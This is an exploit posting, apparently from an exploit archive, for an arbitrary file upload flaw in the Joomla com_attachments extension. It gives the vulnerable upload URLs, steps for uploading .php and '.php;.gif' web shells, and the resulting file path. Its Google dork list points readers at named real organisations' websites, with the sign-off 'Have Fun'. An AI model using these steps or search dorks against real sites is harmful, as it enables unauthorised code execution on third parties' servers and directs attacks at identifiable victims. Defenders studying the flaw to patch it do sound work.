#################################################################### # Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 26/05/2019 # Vendor Homepage : jmcameron.net # Software Download Links : jmcameron.net/attachments/ jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip joomlacode.org/gf/project/attachments/frs/ github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/ # Software Information Links : extensions.joomla.org/extension/attachments/ joomlacode.org/gf/project/attachments/ joomlacode.org/gf/project/attachments3/ # Joomla Affected Versions : Joomla 3.4.8 Joomla 3.5.1 Joomla 3.6.5 Joomla 3.8.1 Joomla 3.8.11 Joomla 3.8.3 Joomla 3.9.6 # Software Affected Versions [ Component Com_Attachments ] : 2.2.2 and 3.2.6 - 3.x / All previous versions. # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:/index.php?option=com_attachments&task=upload intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved. intext:Treadmill Desk from TrekDesk intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla intext:Fundación Jesuitas Paraguay intext:© 2019 Mars Society Polska intext:Designed by atict.com intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com intext:Designed by Burosphere. intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional and more on Google and other Search Engines...... Have Fun.... # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt #################################################################### # Description about Software : *************************** The 'Attachments' extension allows files to be uploaded and attached to content articles in Joomla. Includes a plugin to display attachments and a component for uploading and managing attachments. #################################################################### # Impact : *********** Joomla Attachments Components 3.x and other previous versions could allow a remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation of file extensions by the multiple scripts to index.php. The issue occurs because the application fails to adequately sanitize user-supplied input. Exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. #################################################################### # Arbitrary File Upload/Unauthorized File Insertion Exploit : **************************************************** /index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public " Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system. # Directory File Path : ******************** /attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################